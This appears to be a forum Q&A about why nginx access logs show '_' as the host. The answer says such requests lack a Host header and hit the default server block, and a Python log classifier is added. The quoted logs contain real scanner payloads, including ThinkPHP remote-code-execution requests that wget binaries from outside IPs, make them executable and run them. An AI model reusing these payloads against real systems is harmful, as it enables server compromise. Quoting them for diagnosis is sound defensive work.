
I am using jwilder/nginx-proxy on a server, reachable on the public internet. But actually the only counting part should be that it is nginx.

On a regular basis, I check all the logs of my various docker projects. Of course there are a lot of requests from bots trying to hit any known vulnerability...

And there is one thing I just can't explain to myself: nearly all of these suspicious requests don't show a real domain but just an underline as destination. Here are some example lines:

proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:14:50:06 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | 1.my.RealIP.4 31.28.227.190 - - [12/Jun/2020:14:56:59 +0000] "GET / HTTP/1.0" 503 197 "-" "-"
proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:15:06:57 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET / HTTP/2.0" 200 3372 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET /favicon.ico HTTP/2.0" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | _ 76.71.2.171 - - [12/Jun/2020:15:25:46 +0000] "POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"
proxy_1  | nginx.1  | _ 116.99.130.146 - - [12/Jun/2020:15:29:40 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://51.77.73.39/bins/vciamangement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp GME.ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.158.248.210 - - [12/Jun/2020:15:37:41 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://167.71.185.210/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.202.2.147 - - [05/Jul/2020:20:45:34 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 150 "-" "-"

So, there are requests for a) my IP b) a domain of mine and c) for... underline? What does this underline indicate?

void

1 Answer


It seems that the log format you are using is declared as $host $remote_addr ... and among the server blocks within your configuration you have some default server block where the directive server_name _; is present. Those lines are from requests without an HTTP Host header set. When such a request gets caught by that server block, the value of the $host variable will be exactly an _ (equal to the string used in the server_name directive). Read more about the $host nginx internal variable here. And you'd better not serve such requests, as described in this answer.

Ivan Shatsky
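To make the answer's point checkable against a log file, here is an added example (not part of the question or the answer, and not jwilder/nginx-proxy code) that parses lines in the format shown above and classifies each request by what nginx put in $host: a real domain, a bare IP literal, or the _ of the default server, which means the request carried no usable Host header. It also flags request lines that are not HTTP at all, such as the mstshash line, which is an RDP handshake sent to an HTTP port. The docker-compose "proxy_1 | nginx.1 |" prefix is assumed to be optional, and the sample lines are constructed with documentation IP ranges rather than copied from the page.

```python
import ipaddress
import re
from collections import Counter

# Access-log line as printed by `docker-compose logs` for jwilder/nginx-proxy:
# an optional "<service> | <process> | " prefix (assumed), then the nginx fields
# $host $remote_addr - - [$time_local] "$request" $status $body_bytes_sent
# "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?:\S+\s*\|\s*\S+\s*\|\s*)?'                       # docker-compose prefix, optional
    r'(?P<host>\S+)\s+(?P<remote_addr>\S+)\s+\S+\s+\S+\s+'  # $host $remote_addr - -
    r'\[(?P<time>[^\]]+)\]\s+'                              # [$time_local]
    r'"(?P<request>[^"]*)"\s+'                              # "$request"
    r'(?P<status>\d{3})\s+(?P<bytes>\d+)\s+'                # $status $body_bytes_sent
    r'"(?P<referer>[^"]*)"\s+"(?P<user_agent>[^"]*)"\s*$'   # "$http_referer" "$http_user_agent"
)

# A well-formed HTTP request line ends with the protocol version.
HTTP_REQUEST_RE = re.compile(r' HTTP/\d\.\d$')

# Constructed sample lines mirroring the shapes seen in the question (not real traffic).
SAMPLE_LOG = [
    'proxy_1  | nginx.1  | 203.0.113.4 198.51.100.7 - - [12/Jun/2020:14:50:06 +0000] '
    '"GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 503 599 "-" "Mozilla/5.0"',
    'proxy_1  | nginx.1  | example.com 198.51.100.9 - - [05/Jul/2020:20:49:11 +0000] '
    '"GET / HTTP/2.0" 200 3372 "-" "Mozilla/5.0"',
    'proxy_1  | nginx.1  | _ 198.51.100.23 - - [12/Jun/2020:15:25:46 +0000] '
    '"POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"',
    'proxy_1  | nginx.1  | _ 198.51.100.42 - - [05/Jul/2020:20:45:34 +0000] '
    '"\\x03\\x00\\x00/*\\xE0\\x00Cookie: mstshash=Administr" 400 150 "-" "-"',
]


def classify_host(host: str) -> str:
    """Map the $host field to the kind of name the client asked for."""
    if host == "_":
        # Matched the default server (server_name _;): no Host header, or an empty one.
        return "no_host_header"
    try:
        ipaddress.ip_address(host.strip("[]"))   # handle [v6] literals too
        return "ip_literal"                       # client used the bare server IP
    except ValueError:
        return "domain"


def parse_line(line: str):
    """Return a dict of fields for one log line, or None if it is not in this format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["host_kind"] = classify_host(rec["host"])
    # Non-HTTP payloads (e.g. an RDP handshake) never end with " HTTP/x.y".
    rec["is_http"] = HTTP_REQUEST_RE.search(rec["request"]) is not None
    return rec


def summarize(lines):
    """Count requests per host kind; unparsable lines are counted under 'unparsed'."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        counts["unparsed" if rec is None else rec["host_kind"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for rec in map(parse_line, SAMPLE_LOG):
        print(f'{rec["host_kind"]:15} http={rec["is_http"]!s:5} {rec["request"]!r}')
    print(summarize(SAMPLE_LOG))
```

Anything that lands in the "no_host_header" or "ip_literal" buckets never came from a user who typed your domain, so it is a clean signal for scanner traffic. The usual way to follow the answer's advice is to give the server_name _; block nothing to serve (for example return 444;, which makes nginx close the connection without a response) so these requests never reach a backend.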